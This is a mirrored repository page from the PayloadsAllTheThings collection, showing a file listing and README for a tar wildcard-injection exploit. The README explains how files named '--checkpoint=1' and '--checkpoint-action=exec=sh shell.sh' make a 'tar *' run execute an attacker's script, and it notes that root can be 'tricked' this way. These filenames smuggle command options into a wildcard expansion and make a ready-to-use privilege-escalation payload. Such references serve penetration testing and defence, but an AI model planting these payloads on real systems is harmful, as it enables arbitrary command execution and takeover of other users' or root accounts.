Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/Tar commands execution
History
swisskyrepo bce6dc6d3d Clean project - Renamed and added PHP juggling type
2016-10-20 10:22:24 +07:00
..
--checkpoint-action=exec=sh shell.sh Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
--checkpoint=1 Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
README.md Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
shell.sh Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00

README.md

TAR Command Execution

By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.

Exploit

These files work against a "tar *"

--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh   (your exploit code is here)

Thanks to